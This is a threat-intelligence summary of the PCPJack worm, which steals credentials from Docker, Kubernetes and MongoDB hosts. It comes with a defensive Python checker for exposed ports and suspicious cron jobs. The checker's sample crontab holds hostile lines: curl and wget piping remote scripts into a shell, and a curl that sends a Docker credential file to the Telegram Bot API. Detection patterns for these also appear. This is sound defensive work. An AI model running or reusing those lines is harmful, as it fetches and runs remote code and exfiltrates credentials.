PCPJack Worm Targets TeamPCP Infections for Credential Theft

Severity: High (Score: 70.2)

Sources: www.sentinelone.com, Techcrunch, arstechnica.com, Bleepingcomputer

Summary

A new malware framework named PCPJack has emerged, targeting systems previously compromised by the TeamPCP cybercrime group. The worm steals credentials from exposed infrastructure services such as Docker, Kubernetes, and MongoDB while removing TeamPCP's own access to the host. It is believed to be operated either by former TeamPCP members or by a rival group, and its objective is financial: resale of the stolen credentials and extortion of the victims.

PCPJack propagates by scanning for exposed services and exploiting known vulnerabilities in them. It establishes persistence with a shell script and exfiltrates the stolen data to Telegram channels. SentinelLabs researchers note that its capabilities closely resemble those of earlier TeamPCP campaigns. The threat is assessed as active, with credential theft and lateral movement continuing inside compromised networks.

Key Points:

  • PCPJack targets cloud infrastructure previously compromised by TeamPCP.
  • The malware steals credentials and removes TeamPCP's access to the compromised systems.
  • Current operations focus on financial gain through credential resale and extortion.
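The summary describes two things a defender can check for directly: infrastructure services reachable on a non-loopback interface, and scheduled jobs that fetch-and-execute a remote shell script or talk to the Telegram Bot API. The script below is an added example, not code from SentinelLabs or from the reports cited above, and it uses no indicators published for PCPJack. It assumes the default ports of the services named in the summary, parses `ss -tlnp`-style listener lines and crontab lines, and the sample input embedded in it is constructed (the 198.51.100.0/24 address is RFC 5737 documentation space, and `botTOKEN` is a placeholder).

```python
"""Hygiene check for the exposure and persistence pattern described in the summary.

Added example; not SentinelLabs or TeamPCP/PCPJack code. Heuristics are generic
and derived from the behaviours described above, not from published indicators.
"""
import re
from ipaddress import ip_address

# Services named in the summary, keyed by their default ports (assumption: defaults only).
WATCHED_PORTS = {
    2375: "Docker API (plaintext)",
    2376: "Docker API (TLS)",
    6443: "Kubernetes API server",
    10250: "kubelet API",
    27017: "MongoDB",
}

# `ss -tlnp` rows: State Recv-Q Send-Q Local_Address:Port Peer_Address:Port Process
SS_LINE = re.compile(r"^LISTEN\s+\d+\s+\d+\s+(?P<addr>\S+):(?P<port>\d+)\s")

# Cron heuristics: download piped into a shell, Telegram Bot API use, job run from a tmp dir.
FETCH_EXEC = re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(ba)?sh\b")
TELEGRAM_API = re.compile(r"api\.telegram\.org/bot")
TMP_EXEC = re.compile(r"(^|\s)/(tmp|var/tmp|dev/shm)/\S+")


def _is_nonloopback_bind(addr):
    """True when a listener is reachable from outside the host (wildcard or non-loopback)."""
    a = addr.strip("[]")  # ss prints IPv6 as [::] / [::1]
    if a in ("*", "0.0.0.0", "::"):
        return True
    try:
        return not ip_address(a).is_loopback
    except ValueError:
        return True  # hostname or unparseable: surface it for review rather than hide it


def exposed_services(ss_lines):
    """Return (port, service, bind_address) for watched services not bound to loopback."""
    findings = []
    for line in ss_lines:
        m = SS_LINE.match(line.strip())
        if not m:
            continue  # header or non-LISTEN row
        port = int(m.group("port"))
        if port in WATCHED_PORTS and _is_nonloopback_bind(m.group("addr")):
            findings.append((port, WATCHED_PORTS[port], m.group("addr")))
    return findings


def suspicious_cron(cron_lines):
    """Return (line, reasons) for crontab entries matching the persistence/exfil heuristics."""
    findings = []
    for line in cron_lines:
        s = line.strip()
        if not s or s.startswith("#"):
            continue
        reasons = []
        if FETCH_EXEC.search(s):
            reasons.append("fetch-and-execute")
        if TELEGRAM_API.search(s):
            reasons.append("telegram-bot-api")
        if TMP_EXEC.search(s):
            reasons.append("runs-from-tmp")
        if reasons:
            findings.append((s, reasons))
    return findings


# Constructed sample input (not captured from a real incident).
SAMPLE_SS = [
    "State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process",
    'LISTEN 0      4096   0.0.0.0:2375        0.0.0.0:*   users:(("dockerd",pid=812,fd=9))',
    'LISTEN 0      4096   127.0.0.1:27017     0.0.0.0:*   users:(("mongod",pid=933,fd=12))',
    'LISTEN 0      4096   *:10250             *:*         users:(("kubelet",pid=1044,fd=15))',
    'LISTEN 0      128    0.0.0.0:22          0.0.0.0:*   users:(("sshd",pid=700,fd=3))',
]
SAMPLE_CRON = [
    "# m h dom mon dow command",
    "0 3 * * * /usr/bin/certbot renew --quiet",
    "*/5 * * * * curl -fsSL http://198.51.100.7/x.sh | sh",
    "@reboot /tmp/.a/run.sh >/dev/null 2>&1",
    "0 * * * * wget -qO- http://198.51.100.7/c.sh | bash >/dev/null 2>&1",
    "30 2 * * * curl -s https://api.telegram.org/botTOKEN/sendDocument -F document=@/root/.docker/config.json",
]

if __name__ == "__main__":
    for port, svc, addr in exposed_services(SAMPLE_SS):
        print(f"EXPOSED  {svc} on {addr}:{port}")
    for entry, why in suspicious_cron(SAMPLE_CRON):
        print(f"CRON     {', '.join(why)}: {entry}")
```

On a live host, feed `ss -tlnp` output and the contents of `/etc/crontab`, `/etc/cron.d/*` and each user's crontab into the two functions. A MongoDB bound to 127.0.0.1 is deliberately not reported; the wildcard Docker API and kubelet bindings are, since those are the kind of exposures the summary says PCPJack scans for. The cron heuristics will miss persistence that does not use these patterns, so treat a clean result as absence of these specific signs, not absence of compromise.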

Key Entities

  • Data Breach (attack_type)
  • Malware (attack_type)
  • Phishing (attack_type)
  • Worm (attack_type)
  • PCPJack (campaign)
  • Anthropic (company)
  • Aqua Security (company)
  • DigitalOcean (company)
  • European Commission (company)
  • Mercor (company)
  • Discord (platform)
  • Kubernetes (platform)
  • Linux (platform)
  • MongoDB (platform)
  • RayML (platform)
  • LiteLLM (tool)
  • Docker (tool)
  • Financial (industry)
  • T1003 - OS Credential Dumping (mitre_attack)
  • T1021 - Remote Services (mitre_attack)
  • T1041 - Exfiltration Over C2 Channel (mitre_attack)
  • T1053 - Scheduled Task/Job (mitre_attack)
  • T1059.004 - Unix Shell (mitre_attack)
  • Sliver (malware)